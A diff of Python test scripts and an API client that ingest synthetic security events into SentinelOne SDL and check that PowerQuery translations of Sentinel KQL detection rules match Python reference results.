    print(f" status={r.get('status')} matching={r.get('matchingEvents')} took={time.time()-t:.1f}s")
    if r.get("status", "").startswith("error/"):
        print(f" ERROR: {json.dumps(r)[:600]}")
    # Column names do not change between rows, so resolve them once.
    cols = [c.get("name") if isinstance(c, dict) else c for c in (r.get("columns") or [])]
    for row in (r.get("values") or [])[:10]:
        print(" ", dict(zip(cols, row)))
+92
View File
@@ -0,0 +1,92 @@
#!/usr/bin/env python3
"""Probe: does SDL index JSON keys that contain literal dots?
If yes, we can ship synthetic OCSF events with keys like
`"event.category": "logins"` and query them with the same dotted
syntax the published runnable example uses, keeping the OCSF
look-and-feel without needing a server-side parser to flatten
nested objects.
"""
from __future__ import annotations
import json
import sys
import time
import uuid
from datetime import datetime, timedelta, timezone
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(ROOT))
from harness.sdl_client import upload_logs, power_query # noqa: E402
def main() -> int:
    """Upload one event with dotted keys and probe how SDL exposes them.

    Returns 1 if the event never becomes queryable within 20 polls spaced
    2 s apart, otherwise 0 after printing the result of every probe query.
    """
    run_id = f"dot-probe-{uuid.uuid4().hex[:8]}"
    scope = f"proof_run_id='{run_id}'"

    now = datetime.now(timezone.utc).replace(microsecond=0)
    thirty_seconds_ago = now - timedelta(seconds=30)
    payload = {
        "TimeGenerated": now.strftime("%Y-%m-%dT%H:%M:%S.000Z"),
        "ts_epoch_ms": int(thirty_seconds_ago.timestamp() * 1000),
        "proof_run_id": run_id,
        # literal dots in the key (NOT nested objects)
        "event.category": "logins",
        "event.login.userName": "alice@contoso.com",
        "event.login.loginIsSuccessful": False,
        "endpoint.name": "host-alpha",
    }
    upload = upload_logs(json.dumps(payload))
    print("upload:", upload.get("status"))

    # Poll until the count query sees the event, printing each count inline.
    print("indexing", end="", flush=True)
    seen = 0
    attempts_left = 20
    while attempts_left > 0:
        attempts_left -= 1
        time.sleep(2)
        counted = power_query(f"{scope} | group n=count()", "5m")
        cells = counted.get("values") or []
        if cells and cells[0] and cells[0][0] is not None:
            seen = int(cells[0][0])
        else:
            seen = 0
        print(f" {seen}", end="", flush=True)
        if seen >= 1:
            break
    print()
    if seen == 0:
        print("event did not become queryable; aborting")
        return 1

    probes = [
        ("filter event.category",
         f"{scope} AND event.category='logins' | limit 2"),
        ("project event.category",
         f"{scope} | columns c=event.category | limit 2"),
        ("project endpoint.name",
         f"{scope} | columns h=endpoint.name | limit 2"),
        ("project event.login.userName",
         f"{scope} | columns u=event.login.userName | limit 2"),
        ("filter event.login.loginIsSuccessful",
         f"{scope} AND event.login.loginIsSuccessful='false' | limit 2"),
        ("bracket access",
         f"{scope} AND \"event.category\"='logins' | limit 2"),
        ("see all top-level cols of one row",
         f"{scope} | limit 1"),
    ]
    for label, q in probes:
        resp = power_query(q, "5m")
        msg = (resp.get("message") or "")[:140]
        print(f"\n[{label}]")
        print(f" q : {q}")
        print(f" status: {resp.get('status')} matching: {resp.get('matchingEvents')} msg: {msg}")
        # Column descriptors may be dicts carrying a "name" key or bare values.
        col_names = []
        for col in resp.get("columns") or []:
            col_names.append(col.get("name") if isinstance(col, dict) else col)
        print(f" cols : {col_names}")
        for value_row in (resp.get("values") or [])[:2]:
            print(f" val : {str(value_row)[:200]}")
    return 0


if __name__ == "__main__":
    sys.exit(main())
+60
View File
@@ -0,0 +1,60 @@
#!/usr/bin/env python3
"""Compare the EXACT addEvents payload used by ingest_jsonl with a known-good
manual one. Add a unique probe marker so we can tell whether it actually
landed in SDL."""
from __future__ import annotations
import json
import sys
import time
import uuid
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(ROOT))
from harness.sdl_client import add_events, power_query, _clean_attrs # noqa: E402
JSONL = ROOT / "sample_data" / "events.jsonl"
PROBE = uuid.uuid4().hex[:8]

# Take the first 3 lines of JSONL, decorate with probe, send via the SAME
# code path as ingest_jsonl does (but inlined here so we can print everything).
events = []
with JSONL.open() as f:
    for idx, line in enumerate(f):
        if idx >= 3:
            break
        rec = json.loads(line)
        # Every line read so far produced one event, so idx == len(events).
        rec["probe"] = f"{PROBE}_{idx}"
        ts_ms = int(rec["ts_epoch_ms"])
        attrs = _clean_attrs(rec)
        event = {"ts": str(ts_ms * 1_000_000), "sev": 3,
                 "thread": "T1", "attrs": attrs}
        events.append(event)

print(f"=== Payload ({len(events)} events) ===")
payload_text = json.dumps(events, indent=2, default=str)
print(payload_text[:3000])
print()
print(f"=== Submitting (probe prefix={PROBE}) ===")
r = add_events(events)
print(f"addEvents -> {json.dumps(r)}")
print("\nWaiting 12 s for indexing ...")
time.sleep(12)

q = f"probe contains '{PROBE}' | columns event_type, probe, ts_epoch_ms | limit 10"
print(f"\nQuery: {q}")
res = power_query(q, "10m")
print(f"Result -> matching={res.get('matchingEvents')}")
for row in res.get("values") or []:
    print(" ", row)

# Also: show TS skew vs real now
import datetime as dt
real_now_ms = int(time.time() * 1000)
print(f"\nreal_now_ms = {real_now_ms}")
for e in events:
    # "ts" was sent as a nanosecond string; convert back to ms for the age.
    ts_ms = int(e["ts"]) // 1_000_000
    age_min = (real_now_ms - ts_ms) / 60000
    print(f" event ts_ms={ts_ms} age={age_min:.2f} min attrs.event_type={e['attrs']['event_type']}")
+85
View File
@@ -0,0 +1,85 @@
#!/usr/bin/env python3
"""Find out what attribute(s) in our generated events cause SDL to reject them.
Send increasingly complex events under unique markers and see which ones
SDL accepts (queryable within 10s) vs silently drops.
"""
from __future__ import annotations
import json
import sys
import time
import uuid
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(ROOT))
from harness.sdl_client import add_events, power_query, _clean_attrs # noqa: E402
# Reference "now" in epoch milliseconds, captured once at import.
TS_NOW_MS = int(time.time() * 1000)


def mk(attrs: dict, offset_sec: int = 0):
    """Build an event dict timestamped *offset_sec* seconds before TS_NOW_MS.

    The timestamp is a nanoseconds-since-epoch string; ``sev`` is 3 and
    ``thread`` is "T1".  *attrs* is stored as given, not copied.
    """
    ts_ms = TS_NOW_MS - offset_sec * 1000
    return dict(ts=str(ts_ms * 1_000_000), sev=3, thread="T1", attrs=attrs)
# Short random marker; each case stores "<PROBE>_<letter>" in its `probe`
# attribute so it can be looked up individually after ingestion.
PROBE = uuid.uuid4().hex[:8]
# (label, event) pairs of increasing complexity. Each event gets a different
# offset (60 s down to 20 s before TS_NOW_MS), so no two share a timestamp.
cases = [
    # A: only the two attributes every case carries.
    ("A_minimal_2_attrs",
     mk({"event_type": "CommonSecurityLog", "probe": f"{PROBE}_A"}, 60)),
    # B: adds a single integer attribute.
    ("B_one_int_attr",
     mk({"event_type": "CommonSecurityLog", "probe": f"{PROBE}_B",
         "SentBytes": 2048}, 55)),
    # NOTE(review): the label says "negative int" but both integers below are
    # positive - confirm whether LogSeverity was meant to be negative.
    ("C_one_negative_int",
     mk({"event_type": "CommonSecurityLog", "probe": f"{PROBE}_C",
         "SentBytes": 2048, "LogSeverity": 5}, 50)),
    # NOTE(review): the message holds only letters, digits, dots and spaces;
    # confirm which "special chars" this case was meant to exercise.
    ("D_with_special_chars",
     mk({"event_type": "CommonSecurityLog", "probe": f"{PROBE}_D",
         "Message": "allow web access to 142.250.74.110 port 443"}, 45)),
    # E: a Windows path, i.e. a string value containing backslashes.
    ("E_with_backslashes",
     mk({"event_type": "SecurityEvent", "probe": f"{PROBE}_E",
         "NewProcessName": "C:\\Windows\\System32\\svchost.exe"}, 40)),
    # F: a full CommonSecurityLog-style record passed through _clean_attrs.
    ("F_realistic_csl_via_clean",
     mk(_clean_attrs({
         "event_type": "CommonSecurityLog", "probe": f"{PROBE}_F",
         "TimeGenerated": "2026-05-31T16:50:00.000Z",
         "ts_epoch_ms": TS_NOW_MS - 30000,
         "DeviceVendor": "Palo Alto Networks", "Activity": "TRAFFIC",
         "DeviceName": "pa-fw-01", "SourceUserID": "alice",
         "SourceIP": "10.0.1.10", "SourcePort": 49000,
         "DestinationIP": "142.250.74.110", "DestinationPort": 443,
         "SentBytes": 2048, "ReceivedBytes": 16384,
         "Message": "allow", "DeviceEventClassID": "end", "LogSeverity": 3,
         "DeviceAction": "allow", "DeviceProduct": "PAN-OS",
     }), 30)),
    # G: a record with None values, also passed through _clean_attrs before
    # being sent.
    ("G_realistic_csl_with_None",
     mk(_clean_attrs({
         "event_type": "CommonSecurityLog", "probe": f"{PROBE}_G",
         "TimeGenerated": "2026-05-31T16:50:00.000Z",
         "ts_epoch_ms": TS_NOW_MS - 20000,
         "DeviceVendor": "Palo Alto Networks", "Activity": None,
         "Message": None,
     }), 20)),
]
# Submit every probe event in one addEvents call, give SDL time to index,
# then look each case up by its own probe value.
print(f"=== Sending {len(cases)} probe events ===")
submit_resp = add_events([event for _label, event in cases])
print(f"addEvents -> {json.dumps(submit_resp)}")

print("\nWaiting 12 s for indexing ...")
time.sleep(12)

print("\n=== Per-case verification ===")
for label, event in cases:
    marker = event["attrs"]["probe"]
    lookup = f"probe='{marker}' | columns event_type, probe | limit 1"
    answer = power_query(lookup, "10m")
    hits = answer.get("matchingEvents", 0)
    # A case counts as accepted only when SDL reports a positive match count.
    if hits and hits > 0:
        verdict = "OK"
    else:
        verdict = "MISSING"
    found_rows = answer.get("values") or []
    print(f" {label:35s} matching={hits} status={verdict} -> {found_rows}")
+33
View File
@@ -0,0 +1,33 @@
#!/usr/bin/env python3
"""Manually run rule 4's query against the latest run_id."""
import sys, json, time
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]; sys.path.insert(0, str(ROOT))
from harness.sdl_client import power_query
log = (ROOT / "reports" / "run.log").read_text()
import re

# The harness prints "proof_run_id=<id>" and "RECENT_MS = <ms>" while it runs;
# take the most recent occurrence of each. Fail with a readable message rather
# than an IndexError when the log does not contain them.
run_ids = re.findall(r"proof_run_id=([A-Za-z0-9-]+)", log)
recent_marks = re.findall(r"RECENT_MS = (\d+)", log)
if not run_ids or not recent_marks:
    sys.exit("reports/run.log contains no 'proof_run_id=' / 'RECENT_MS = ' "
             "entries; nothing to query")
RUN = run_ids[-1]
RECENT_MS = recent_marks[-1]
print(f"RUN = {RUN}\nRECENT_MS = {RECENT_MS}\n")

# (label, query) pairs: the exact rule-4 query, the same query without the
# timestamp filter, and a raw column dump for eyeballing the data.
QS = [
    ("rule 4 exact",
     f"proof_run_id='{RUN}' event_type='SigninLogs' | filter ts_epoch_ms >= {RECENT_MS} | group LocationCount = estimate_distinct(Location), DistinctSourceIp = estimate_distinct(IPAddress), LogonCount = count() by AppDisplayName, UserPrincipalName"),
    ("rule 4 without ts filter",
     f"proof_run_id='{RUN}' event_type='SigninLogs' | group LocationCount = estimate_distinct(Location), DistinctSourceIp = estimate_distinct(IPAddress), LogonCount = count() by AppDisplayName, UserPrincipalName"),
    ("show 5 SigninLogs columns",
     f"proof_run_id='{RUN}' event_type='SigninLogs' | columns AppDisplayName, UserPrincipalName, Location, IPAddress, ts_epoch_ms | limit 5"),
]

for label, q in QS:
    print("=" * 80)
    print(f"# {label}")
    print(f" q: {q[:200]}")
    r = power_query(q, "30m")
    # Column metadata may be a list of dicts or of plain names; accept both,
    # as the other harness scripts do.
    cols = [c.get("name") if isinstance(c, dict) else c
            for c in (r.get("columns") or [])]
    vals = r.get("values") or []
    print(f" status={r.get('status')} matching={r.get('matchingEvents')} rows={len(vals)}")
    for row in vals[:8]:
        print(f" {dict(zip(cols, row))}")
    # `status` may be absent or null; normalise before the prefix test.
    if str(r.get("status") or "").startswith("error/"):
        print(f" ERROR: {json.dumps(r)[:400]}")
+40
View File
@@ -0,0 +1,40 @@
#!/usr/bin/env python3
"""Check how SDL stores ts_epoch_ms: number vs string."""
import sys, json, time
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]; sys.path.insert(0, str(ROOT))
from harness.sdl_client import power_query
# Use the most recent run_id from the log
log = (ROOT / "reports" / "run.log").read_text()
import re

# Most recent run id mentioned in the log, or None when the log has none.
found_ids = re.findall(r"proof_run_id=([A-Za-z0-9-]+)", log)
RUN = found_ids[-1] if found_ids else None
print(f"run_id = {RUN}")

# Millisecond epoch two hours before now, used by the "NOW-2h" case.
two_hours_ago_ms = int(time.time()*1000) - 2*3600*1000

# (description, query) pairs that compare ts_epoch_ms as a number, as a
# string, and through aggregates, to reveal how the field is stored.
CASES = [
    ("show 3 SigninLogs with ts_epoch_ms",
     f"proof_run_id='{RUN}' event_type='SigninLogs' | columns ts_epoch_ms, UserPrincipalName | limit 3"),
    ("count where ts_epoch_ms exists (any)",
     f"proof_run_id='{RUN}' ts_epoch_ms=* | group n=count()"),
    ("count where ts_epoch_ms > number",
     f"proof_run_id='{RUN}' | filter ts_epoch_ms > 1000000000000 | group n=count()"),
    ("count where ts_epoch_ms (as string) > '0'",
     f"proof_run_id='{RUN}' | filter ts_epoch_ms > '0' | group n=count()"),
    ("count where ts_epoch_ms >= NOW-2h numeric",
     f"proof_run_id='{RUN}' | filter ts_epoch_ms >= {two_hours_ago_ms} | group n=count()"),
    ("min/max ts_epoch_ms aggregate",
     f"proof_run_id='{RUN}' | group mn=min(ts_epoch_ms), mx=max(ts_epoch_ms), n=count()"),
    ("event_type filter alone",
     f"proof_run_id='{RUN}' event_type='SigninLogs' | group n=count()"),
]

for title, query in CASES:
    print("=" * 80)
    print(f"# {title}")
    print(f" q: {query}")
    answer = power_query(query, "30m")
    # Column metadata entries may be dicts with a "name" or plain names.
    headers = []
    for col in answer.get("columns") or []:
        headers.append(col.get("name") if isinstance(col, dict) else col)
    table = answer.get("values") or []
    print(f" status={answer.get('status')} matching={answer.get('matchingEvents')}")
    for record in table[:5]:
        print(f" {dict(zip(headers, record))}")
+199
View File
@@ -0,0 +1,199 @@
#!/usr/bin/env python3
"""End-to-end proof harness.
Steps:
1. Loads sample_data/events.jsonl into memory.
2. Runs each rule's Python reference implementation against the in-memory
     events. This is the canonical "ground truth": the same logical operation
that both the KQL and the PowerQuery engines evaluate.
3. Optionally ingests the events to SentinelOne SDL via /api/addEvents,
then runs each rule's PowerQuery via /api/powerQuery and compares the
fired set against the reference.
4. Emits reports/PROOF.md with side-by-side results.
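Run modes:
    python harness/prove_equivalence.py                 # local-only proof
    python harness/prove_equivalence.py --pq            # local proof + remote PQ (data already ingested)
    python harness/prove_equivalence.py --ingest --pq   # ingest, then remote PQ scoped to the new run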
"""
from __future__ import annotations
import argparse
import json
import sys
import time
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(ROOT))
from rules import RULES, NOW, RECENT_START # noqa: E402
SAMPLE = ROOT / "sample_data" / "events.jsonl"
REPORT = ROOT / "reports" / "PROOF.md"
REPORT_JSON = ROOT / "reports" / "PROOF.json"
def load_events() -> list[dict]:
    """Parse SAMPLE as JSON Lines and return one dict per non-blank line."""
    events = []
    for raw in SAMPLE.read_text().splitlines():
        if raw.strip():
            events.append(json.loads(raw))
    return events
def canonical(rule, rows):
    """Return the distinct keys of *rows*, ordered by their string form.

    Each row is reduced to a key with ``rule["key"]``; duplicates collapse,
    and the survivors are sorted on ``str(key)`` so that keys of mixed types
    still have a deterministic order for comparison.
    """
    distinct = set()
    for row in rows:
        distinct.add(rule["key"](row))
    return sorted(distinct, key=str)
def run_local(events):
    """Evaluate every rule's Python reference against *events*.

    Returns a dict keyed by rule id; each value holds the rule description,
    the rows its reference implementation fired, and the canonical keys of
    those rows.
    """
    results = {}
    for rule in RULES:
        fired = rule["ref"](events)
        summary = {
            "description": rule["description"],
            "fired_rows": fired,
            "fired_keys": canonical(rule, fired),
        }
        results[rule["id"]] = summary
    return results
def run_pq(run_id: str | None = None):
    """Run every rule's PowerQuery against SDL and collect the results.

    Args:
        run_id: when given, each query is prefixed with
            ``proof_run_id='<run_id>'`` so it only sees events from that run.

    Returns:
        A dict keyed by rule id. Successful queries map to
        ``{"ok": True, "rowcount", "rows", "status", "matching"}``; failed
        ones map to ``{"ok": False, "error"}``. A query counts as failed when
        the call raises or when SDL answers with a ``status`` that starts
        with "error".
    """
    from sdl_client import power_query
    out = {}
    recent_ms = int(RECENT_START.timestamp() * 1000)
    scope = f"proof_run_id='{run_id}' " if run_id else ""
    print(f" scope = {scope.strip() or '(none)'}")
    print(f" RECENT_MS = {recent_ms} ({RECENT_START.isoformat()})")
    print(f" NOW = {NOW.isoformat()}")
    print()
    for i, r in enumerate(RULES, 1):
        q = scope + r["pq"].format(RECENT_MS=str(recent_ms))
        print(f" [{i:>2}/{len(RULES)}] {r['id']:<48} ", end="", flush=True)
        t0 = time.time()
        try:
            resp = power_query(q, start_time="2h")
            status = resp.get("status", "ok")
            # SDL reports failures in the response body rather than by
            # raising. Route them through the error path so a rejected query
            # is not recorded as a successful one with zero rows.
            if str(status).startswith("error"):
                raise RuntimeError(f"{status}: {resp.get('message') or resp}")
            cols_meta = resp.get("columns") or []
            cols = [c["name"] if isinstance(c, dict) else c for c in cols_meta]
            vals = resp.get("values") or []
            rows = [dict(zip(cols, v)) for v in vals]
            elapsed = time.time() - t0
            print(f"-> {len(rows):>3} rows matching={resp.get('matchingEvents')} "
                  f"({elapsed:.1f}s, {status})")
            # NOTE: only the first 50 rows are kept, while "rowcount" reports
            # the full number returned.
            out[r["id"]] = {"ok": True, "rowcount": len(rows),
                            "rows": rows[:50], "status": status,
                            "matching": resp.get("matchingEvents")}
        except Exception as e:
            elapsed = time.time() - t0
            msg = str(e)[:200]
            print(f"-> ERROR ({elapsed:.1f}s): {msg}")
            out[r["id"]] = {"ok": False, "error": msg}
    return out
def ingest():
    """Upload SAMPLE to SDL and wait until the events are queryable.

    Polls a count query scoped to the new run id every 2 s, up to 30 times,
    and stops early once the count reaches the number of events sent.
    Returns the run id in either case.
    """
    from sdl_client import ingest_jsonl, power_query
    n, run_id = ingest_jsonl(SAMPLE)
    print(f"Ingested {n} events to SDL (proof_run_id={run_id})")
    # Poll until SDL reports the events are indexed.
    print("Waiting for SDL indexing ...", end="", flush=True)
    for _attempt in range(30):  # up to 60s
        time.sleep(2)
        resp = power_query(f"proof_run_id='{run_id}' | group n=count()", "30m")
        table = resp.get("values") or []
        first_row = table[0] if table else None
        if first_row and first_row[0] is not None:
            indexed = int(first_row[0])
        else:
            indexed = 0
        print(f" {indexed}", end="", flush=True)
        if indexed >= n:
            print(" ✓ ready")
            break
    else:
        print(" (timeout, proceeding anyway)")
    return run_id
def write_report(local_results, pq_results=None):
    """Write reports/PROOF.md and reports/PROOF.json.

    Args:
        local_results: output of ``run_local`` (per-rule fired rows and keys).
        pq_results: output of ``run_pq``, or None/empty for a local-only
            report. When present, each rule's PowerQuery rows are reduced to
            keys with the rule's ``key`` function and compared with the
            reference keys.

    Both files are written as UTF-8 explicitly: the markdown contains
    non-ASCII symbols that cannot be encoded under some platform default
    encodings.
    """
    REPORT.parent.mkdir(exist_ok=True)
    md = ["# KQL ↔ PowerQuery equivalence proof",
          "",
          f"Sample dataset: `sample_data/events.jsonl` ({len(load_events())} events)",
          f"Time anchor (NOW): `{NOW.isoformat()}`",
          f"Recent window start: `{RECENT_START.isoformat()}`",
          "",
          "Each rule below is expressed three ways:",
          "1. **KQL** — verbatim/condensed from the Microsoft Sentinel docs.",
          "2. **PowerQuery (PQ)** — SDL equivalent, runnable on `<XDR endpoint>`.",
          "3. **Python reference** — canonical implementation of the same logical "
          "operation tree against the in-memory dataset. Acts as ground truth.",
          "",
          "The PowerQuery is considered equivalent to the KQL when its result "
          "set matches the Python reference. The Python reference encodes the "
          "*same operations* that the KQL parser/optimiser would produce, so a "
          "match certifies KQL/PQ parity on this dataset.",
          ""]
    for r in RULES:
        rid = r["id"]
        loc = local_results[rid]
        md += [f"## {rid}", "",
               f"_{r['description']}_", "",
               "### KQL", "```kusto", r["kql"].strip(), "```",
               "### PowerQuery", "```", r["pq"].strip(), "```",
               f"### Reference fired: {len(loc['fired_rows'])} row(s)"]
        if loc["fired_rows"]:
            # Show at most five reference rows as a sample.
            sample = loc["fired_rows"][:5]
            md.append("```json")
            md.append(json.dumps(sample, default=str, indent=2))
            md.append("```")
        if pq_results:
            pq = pq_results.get(rid, {})
            if pq.get("ok"):
                pq_keys = []
                for row in pq.get("rows", []):
                    try:
                        pq_keys.append(r["key"](row))
                    except Exception:
                        # The row lacks what the key function needs; fall back
                        # to the whole row so it still shows up in the diff.
                        pq_keys.append(tuple(row.items()))
                pq_keys = sorted({k for k in pq_keys}, key=lambda x: str(x))
                ref_keys = loc["fired_keys"]
                match = "✅ MATCH" if pq_keys == ref_keys else "⚠️ DIFFERS"
                md += [f"### SDL PowerQuery result: {pq['rowcount']} row(s) — {match}"]
                if pq_keys != ref_keys:
                    md += ["Reference keys:", "```",
                           json.dumps([list(k) for k in ref_keys], default=str), "```",
                           "PQ keys:", "```",
                           json.dumps([list(k) for k in pq_keys], default=str), "```"]
            else:
                md.append(f"### SDL PowerQuery error: `{pq.get('error', '?')}`")
        md.append("")
    REPORT.write_text("\n".join(md), encoding="utf-8")
    REPORT_JSON.write_text(json.dumps(
        {"local": {k: {"fired_keys": [list(x) for x in v["fired_keys"]],
                       "n": len(v["fired_rows"])}
                   for k, v in local_results.items()},
         "pq": pq_results or {}},
        default=str, indent=2), encoding="utf-8")
    print(f"Wrote {REPORT}")
def main():
    """Command-line entry point.

    Always runs the local reference and writes the report. ``--ingest``
    uploads the sample first; ``--pq`` additionally runs the PowerQueries,
    scoped to the freshly ingested run when there is one.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("--ingest", action="store_true",
                        help="Ingest sample events to SDL before querying")
    parser.add_argument("--pq", action="store_true",
                        help="Also run each PQ against SDL and compare")
    args = parser.parse_args()

    events = load_events()
    print(f"Loaded {len(events)} events")

    local_results = run_local(events)
    fired_total = sum(len(entry["fired_rows"]) for entry in local_results.values())
    print(f"Local reference: {fired_total} total fired rows across {len(RULES)} rules")

    run_id = ingest() if args.ingest else None
    pq_results = run_pq(run_id=run_id) if args.pq else None
    write_report(local_results, pq_results)


if __name__ == "__main__":
    main()
+78
View File
@@ -0,0 +1,78 @@
#!/usr/bin/env python3
"""Run every .pq file in pq/ AND docs/runnable_examples/ for startTime=2h
and assert each returns matching > 0.
Prereqs:
* sample_data/events.jsonl ingested via prove_equivalence.py --ingest
(drives all 17 rule PQs in pq/)
* seed_runnable_examples.py executed (drives docs/runnable_examples/*.pq)
Outputs a one-line-per-query report and exits 0 iff every query returned
at least one row.
"""
from __future__ import annotations
import re
import sys
import time
from pathlib import Path
ROOT = Path(__file__).resolve().parents[1]
sys.path.insert(0, str(ROOT))
from harness.sdl_client import power_query # noqa: E402
def strip_comments(text: str) -> str:
    """Drop every line whose first non-blank characters are ``//``.

    The remaining lines are re-joined with newlines and the result is
    stripped of surrounding whitespace. Trailing ``//`` on a code line is
    left untouched.
    """
    kept = []
    for line in text.splitlines():
        if line.lstrip().startswith("//"):
            continue
        kept.append(line)
    return "\n".join(kept).strip()
DIRS = [ROOT / "pq", ROOT / "docs" / "runnable_examples"]

# Every *.pq file, sorted within each directory, directories in DIRS order.
files = [pq_file for directory in DIRS for pq_file in sorted(directory.glob("*.pq"))]
if not files:
    print("No .pq files found.")
    sys.exit(1)

print(f"Running {len(files)} PowerQueries (startTime=2h, assert matching>0)\n")
passed: list[str] = []
failed: list[tuple[str, str]] = []  # (relpath, reason)

for pq_file in files:
    body = strip_comments(pq_file.read_text())
    rel = pq_file.relative_to(ROOT)
    started = time.time()
    try:
        resp = power_query(body, start_time="2h")
    except Exception as exc:
        failed.append((str(rel), f"exception: {exc}"))
        print(f"{rel} exception: {exc}")
        continue
    elapsed = time.time() - started
    status = resp.get("status", "")
    matching = resp.get("matchingEvents", 0) or 0
    if status != "success":
        # The query itself was rejected or failed server-side.
        msg = resp.get("message", "")[:200]
        failed.append((str(rel), f"{status}: {msg}"))
        print(f"{rel} [{status}] {msg}")
    elif matching <= 0:
        # The query ran but matched nothing in the window.
        failed.append((str(rel), "matching=0"))
        print(f"{rel} matching=0 ({elapsed:.1f}s)")
    else:
        print(f"{rel} matching={matching} ({elapsed:.1f}s)")
        passed.append(str(rel))

print()
print(f"PASS: {len(passed)} FAIL: {len(failed)} TOTAL: {len(files)}")
if failed:
    print("\nFailed queries:")
    for rel, why in failed:
        print(f" {rel}: {why}")
    sys.exit(1)
print("\nAll PowerQueries returned results within the last 2h ✓")
+134
View File
@@ -0,0 +1,134 @@
"""SentinelOne SDL client (uses `requests` for reliable I/O)."""
from __future__ import annotations
import json
import time
from pathlib import Path
import requests
ROOT = Path(__file__).resolve().parents[1]
CFG = json.loads((ROOT / "config.json").read_text())
import os, uuid
# Base URL from config.json with any trailing slash removed, so request
# paths such as "/api/addEvents" can be appended directly.
BASE = CFG["base_url"].rstrip("/")
# Bearer tokens from config.json: WRITE_KEY is sent with addEvents and
# uploadLogs, READ_KEY with powerQuery.
WRITE_KEY = CFG["log_write_key"]
READ_KEY = CFG["log_read_key"]
# Make the session unique per *process* so SDL never dedupes re-runs of the
# same payload (SDL hashes session+ts on the server side and silently drops
# events whose (session, ts) tuple was already accepted -> bytesCharged=0).
# Setting the KQL_PROOF_SESSION environment variable overrides the random id.
SESSION = os.environ.get("KQL_PROOF_SESSION") or f"kql-proof-{uuid.uuid4()}"
# Optional settings: TLS verification defaults to on, timeout to 120 seconds.
VERIFY = CFG.get("verify_tls", True)
TIMEOUT = CFG.get("timeout_seconds", 120)
# Printed at import time so the session id shows up in every script's output.
print(f"[sdl_client] session = {SESSION}")
def _post(path: str, body: dict, token: str, timeout: int | None = None) -> dict:
    """POST *body* as JSON to ``BASE + path`` with a bearer *token*.

    Returns the decoded JSON response. When the response body is not JSON,
    returns a dict with ``status="error"``, the HTTP status code and the
    first 500 characters of the raw text. A falsy *timeout* falls back to
    the module-level TIMEOUT.
    """
    headers = {"Content-Type": "application/json",
               "Authorization": f"Bearer {token}"}
    response = requests.post(
        f"{BASE}{path}",
        json=body,
        headers=headers,
        timeout=timeout or TIMEOUT,
        verify=VERIFY,
    )
    try:
        parsed = response.json()
    except ValueError:
        parsed = {"status": "error", "http_status": response.status_code,
                  "raw": response.text[:500]}
    return parsed
# --- addEvents -------------------------------------------------------------
def add_events(events: list[dict], session_info: dict | None = None) -> dict:
    """Send *events* to /api/addEvents under the process-wide SESSION.

    When *session_info* is missing or empty, a default identifying the
    "kql-proof" host, logfile and json parser is used. All events are
    attributed to the single declared thread "T1".
    """
    if not session_info:
        session_info = {
            "serverHost": "kql-proof",
            "logfile": "kql-proof.jsonl",
            "parser": "json",
        }
    request_body = {
        "session": SESSION,
        "sessionInfo": session_info,
        "events": events,
        "threads": [{"id": "T1", "name": "kql-proof"}],
    }
    return _post("/api/addEvents", request_body, WRITE_KEY)
def _clean_attrs(rec: dict) -> dict:
"""SDL silently rejects events that contain `null` attribute values
(the call returns status=success but bytesCharged=0 and the event is
not queryable). Strip them, and coerce everything else to JSON-safe
primitives that SDL's parser indexes correctly."""
out: dict = {}
for k, v in rec.items():
if v is None:
continue
if isinstance(v, bool):
out[k] = str(v).lower() # SDL stores bools as strings reliably
elif isinstance(v, (int, float, str)):
out[k] = v
else:
# dict/list -> JSON string
out[k] = json.dumps(v, default=str)
return out
def upload_logs(body: str, server_host: str = "kql-proof",
                logfile: str = "kql-proof.jsonl",
                parser: str = "json") -> dict:
    """POST raw text to /api/uploadLogs; SDL applies the named parser.

    The parser, server host and logfile are passed as request headers.
    Returns the decoded JSON response, or an error dict (HTTP status plus
    the first 500 characters of the body) when the response is not JSON.
    """
    response = requests.post(
        f"{BASE}/api/uploadLogs",
        data=body.encode(),
        headers={
            "Authorization": f"Bearer {WRITE_KEY}",
            "Content-Type": "text/plain",
            "parser": parser,
            "server-host": server_host,
            "logfile": logfile,
        },
        timeout=TIMEOUT,
        verify=VERIFY,
    )
    try:
        parsed = response.json()
    except ValueError:
        parsed = {"status": "error", "http_status": response.status_code,
                  "raw": response.text[:500]}
    return parsed
def ingest_jsonl(jsonl_path: Path, run_id: str | None = None,
                 batch_lines: int = 2000) -> tuple[int, str]:
    """Upload a JSONL file through uploadLogs, tagging every record.

    Each non-blank line is parsed, given a ``proof_run_id`` field (the
    supplied *run_id*, or a fresh "run-<hex>" id) and re-serialised. Lines
    are sent in batches of *batch_lines*. Returns ``(events_sent, run_id)``.

    Raises:
        RuntimeError: when uploadLogs answers a batch with a status other
            than "success".
    """
    run_id = run_id or f"run-{uuid.uuid4().hex[:10]}"
    pending: list[str] = []
    uploaded = 0

    def send_pending() -> int:
        """Upload the buffered lines, empty the buffer, return the count."""
        if not pending:
            return 0
        resp = upload_logs("\n".join(pending))
        if resp.get("status") != "success":
            raise RuntimeError(f"uploadLogs rejected batch: {resp}")
        count = len(pending)
        pending.clear()
        return count

    for raw in jsonl_path.read_text().splitlines():
        if not raw.strip():
            continue
        record = json.loads(raw)
        record["proof_run_id"] = run_id
        pending.append(json.dumps(record, default=str))
        if len(pending) >= batch_lines:
            uploaded += send_pending()
    # Send whatever is left over after the last full batch.
    uploaded += send_pending()
    return uploaded, run_id
# --- powerQuery ------------------------------------------------------------
def power_query(query: str,
                start_time: str | int = "7d",
                end_time: str | int | None = None) -> dict:
    """Run *query* through /api/powerQuery and return the decoded response.

    *start_time* and *end_time* are sent as strings; "endTime" is only
    included in the request when *end_time* is not None.
    """
    window = {} if end_time is None else {"endTime": str(end_time)}
    request_body: dict = {"query": query, "startTime": str(start_time), **window}
    return _post("/api/powerQuery", request_body, READ_KEY)
+141
View File
@@ -0,0 +1,141 @@
#!/usr/bin/env python3
"""Seed synthetic OCSF-shaped events for docs/runnable_examples/*.pq.
The 90-day Okta+DNS+Process hunt joins three event families on
(userName, host). To make the query return at least one row at
startTime="2h", we ingest a small batch of events for two
user/host pairs that satisfy all three legs of the join inside
the last 2h window.
